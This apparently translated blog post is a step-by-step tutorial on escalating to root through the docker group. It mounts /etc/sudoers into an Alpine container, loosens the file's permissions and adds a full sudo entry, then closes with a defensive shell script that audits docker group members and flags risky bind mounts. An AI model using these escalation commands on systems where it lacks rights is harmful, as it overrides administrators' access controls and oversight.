You don't have administrator rights on your local machine? Do you have Linux and Docker? If the answer to both questions is yes, this article shows how to use Docker to modify the
sudoers file and, through it, gain administrator privileges.
This article was translated from Polish using Google Translate. The original post can be found on my blog at https://blog.budzynskimaciej.pl.
The method presented here requires that the restricted user can run docker commands, i.e. that the user belongs to the `docker` group. The Docker configuration requires the user to belong to this group. The method only works on Linux (tested on Ubuntu).
- Run Alpine Linux with the `sudoers` file mounted in the container:

  ```
  docker run -it -v /etc/sudoers:/sudoers --rm alpine /bin/sh
  ```

- Change the permissions so the file can be edited, and open it:

  ```
  chmod 777 sudoers
  vi sudoers
  ```

- Add the required permissions for the user in the `sudoers` file (press the `i` key to add an entry):

  ```
  # A tab is required between user and ALL (TAB once, not 4 spaces)
  user	ALL=(ALL:ALL) ALL
  ```

- Exit vi and save the changes.
- Change the permissions of the `sudoers` file back to the default values and exit the container console:

  ```
  chmod 755 sudoers
  exit
  ```

- Verify the changes to the `sudoers` file:

  ```
  cat /etc/sudoers
  sudo su
  ```

The `docker run` command pulls the Alpine Linux image and then starts a container from that image. The `-it` parameter launches interactive mode (keeps STDIN open, even if it's not connected) and allocates a pseudo-TTY. The `-v` parameter binds a host directory or file to a container volume. In this case, we bind the host file `/etc/sudoers` to the `sudoers` file in the root of our container. The `--rm` parameter causes the created container to be deleted when the shell exits. The `alpine /bin/sh` fragment selects the image from which the container is created (in this case, Alpine Linux) and the command (program) to launch, `/bin/sh`, i.e. the system shell.

The `/etc/sudoers` file is protected against editing by default. Because Alpine is a minimalistic Linux distribution, it comes with the vi editor by default. The `sudoers` file should be edited with `visudo`, but Alpine does not have it installed by default. In order to edit the file, give the current user full permissions on it with the `chmod 777 sudoers` command, run inside the Alpine container. Then open the `sudoers` file in the vi editor with the command `vi sudoers`. To enter text in vi, press the `i` key on the keyboard.

The entry `user ALL=(ALL:ALL) ALL` gives the user permission to execute all commands. The first field is the name of the user affected by the rule (`user`). The first `ALL` means that the rule applies to all hosts. The second `ALL` means that user `user` can run commands as all users. The third `ALL` means that user `user` can run commands as all groups. The fourth `ALL` means that the rule applies to all commands. Remember to keep the appropriate formatting in the file. In Ubuntu, between `user` and `ALL` there was a single tab (not four spaces). Personally, I'm not sure if using a single space or 4 spaces won't break anything, so I kept the target formatting to be sure.

To exit the vi editor and save the changes, press the `Esc` key on the keyboard, and then type `:wq`. The characters after the colon are commands for vi: `w` saves the changes made to the file and `q` closes the file.

We change the permissions on the `sudoers` file back to the default values from before editing, and then exit the container shell with the `exit` command. On exit, the Alpine container is removed. Only the downloaded image remains on the disk.

To verify the access, we can use the command `cat /etc/sudoers` to check that the entries were added correctly. We can also use the `sudo su` command to check that we can execute commands with sudo.

As you can see, Docker lets you change user permissions and modify files that you do not have access to by default. The `docker` group is effectively an administrative group: a user in this group who can execute docker commands can modify any file without needing administrator rights.
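
Because membership in the `docker` group is equivalent to administrator access, a host audit should treat it that way. The following is an added example, not code from the original article: it lists the members of the `docker` group and flags `docker run` command lines that bind-mount sensitive host paths such as `/etc/sudoers`. The function names, the prefix list and the sample input are assumptions constructed for illustration.

```shell
# Added defensive example, not the article's code. The prefix list is an assumption.
SENSITIVE_PREFIXES='/ /etc /root /var/run/docker.sock /run/docker.sock'
# Read group(5) text on stdin and print the members of the docker group.
docker_group_members() { awk -F: '$1 == "docker" { print $4 }'; }

# Succeed when host path $1 equals a sensitive prefix or lies beneath one.
is_sensitive() {
    for prefix in $SENSITIVE_PREFIXES; do
        case "$1" in "$prefix" | "$prefix"/*) return 0 ;; esac
    done
    return 1
}

# Print the host side of each -v/--volume/--mount option in $1 (no quote parsing).
bind_sources() {
    printf '%s\n' "$1" | awk '{
        for (i = 1; i <= NF; i++) {
            w = $i
            if (sub(/^--volume=/, "", w)) prev = "-v"
            if (sub(/^--mount=/, "", w)) prev = "--mount"
            if ((prev == "-v" || prev == "--volume") && w ~ /:/) {
                split(w, part, ":"); print part[1]
            } else if (prev == "--mount") {
                n = split(w, kv, ",")
                for (j = 1; j <= n; j++)
                    if (sub(/^(source|src)=/, "", kv[j])) print kv[j]
            }
            prev = $i
        }
    }'
}

# Read command lines on stdin; print "host_path<TAB>command" for risky mounts.
flag_risky_runs() {
    while IFS= read -r line; do
        bind_sources "$line" | while IFS= read -r src; do
            if is_sensitive "$src"; then printf '%s\t%s\n' "$src" "$line"; fi
        done
    done
}

# Constructed sample input (not real host data).
SAMPLE_GROUP='sudo:x:27:alice
docker:x:998:bob,carol'
SAMPLE_CMDS='docker run -it -v /etc/sudoers:/sudoers --rm alpine /bin/sh
docker run --rm -v appdata:/var/lib/app nginx
docker run --mount type=bind,source=/var/run/docker.sock,target=/d.sock alpine
docker run -d --volume=/srv/www:/usr/share/nginx/html:ro nginx'
printf '%s\n' "$SAMPLE_GROUP" | docker_group_members
printf '%s\n' "$SAMPLE_CMDS" | flag_risky_runs
```

On a real host, pipe `/etc/group` into `docker_group_members` and feed `flag_risky_runs` from whatever source records command lines, for example process audit logs.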